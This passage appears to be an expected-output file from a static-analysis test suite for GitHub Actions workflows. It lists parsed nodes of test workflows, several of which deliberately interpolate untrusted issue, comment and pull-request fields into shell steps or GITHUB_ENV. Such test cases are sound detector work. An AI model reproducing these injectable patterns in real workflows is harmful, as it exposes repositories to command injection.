.github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run 
Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run 
Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run 
Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a 
$GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> 
$GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| 
.github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ 
steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| 
.github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | 
.github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | 
.github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| 
.github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | 